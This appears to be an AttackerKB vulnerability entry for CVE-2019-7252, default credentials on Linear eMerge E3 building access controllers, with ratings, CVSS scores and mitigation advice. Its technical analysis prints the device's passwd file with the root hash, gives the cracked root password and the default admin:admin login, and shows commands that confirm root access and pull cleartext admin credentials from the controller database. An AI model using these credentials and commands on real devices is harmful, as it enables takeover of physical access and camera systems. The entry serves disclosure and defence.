Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
1

CVE-2019-7252

Disclosure Date: July 02, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Credential Access
Techniques
Validation
Validated
Initial Access
Techniques
Validation
Validated
Validated

Description

Linear eMerge E3-Series devices have Default Credentials.

Add Assessment

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

In my article cve-2019-7256 at attackerkb.com, I already elaborated on the security risks and vulnerabilities that still exists on the Linear eMerge E3 access controller.
Beside the RCE vulnerabilities, also default credentials exist within the vulnerable configuration that can be easily leveraged to gain privileged access to the system.

There are two significant vulnerabilities:
The first one is based on a default root password that is a stored in the /etc/passwd and is available on the vulnerable configuration. This can be used to escalate to root privileges using the RCE vulnerability CVE-2019-7256 or use these credentials in combination with ssh (if enabled) to get root access to the access controller.
The second credential vulnerability allows an unauthenticated malicious actor to obtain the web credentials for user admin from the spider database that is accessible and readable for the world on the access controller. With this access, the malicious actor is able to control the Linear eMerge E3 access platform, the access to building and its cameras and the authority to manage the access rights of users.

Lets quickly demonstrate both vulnerabilities…

We assume that we have already gained access to the system using the RCE described in CVE-2019-7256

ls -l /etc/passwd
-rwxr--r--    1 e3user   linear         733 Nov 13  2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh

AS you can see is the default root password hash stored directly in /etc/passwd and readable for world. Normally, these password hashes are stored in a /etc/shadow file that is only readable for root. With this configuration, It is very easy to retrieve the hash and run a password dictionary or brute force attack with for instance hashcat to retrieve the password. And do not worry, somebody did this job already in 2019 ;–) –> davestyle.

To test if the root default password is available…

echo davestyle | su -c whoami
root

The second credential vulnerability can be exploited by querying the spider access controller database which has the user and password information stored in clear text.

This database resides in /tmp/SpiderDB/Spider.db and with the command below you can very easily retrieve the admin web credentials.

grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID
ID='admin',Password='xxxxxxx'

And if this is not successful, you can always try the default web credential setting admin:admin

Another Metasploit module to test the availability of the default root password and leak the admin web credentials has been submitted to the Metasploit mainstream.

Mitigation

Change the default root password on your access controller.
Update your Linear eMerge E3 access controller to a higher version then 1.00-06.

References

Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm

Credits

Credits goes to the security researcher below who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • nortekcontrol

Products

  • linear emerge elite firmware,
  • linear emerge essential firmware

Additional Info

Technical Analysis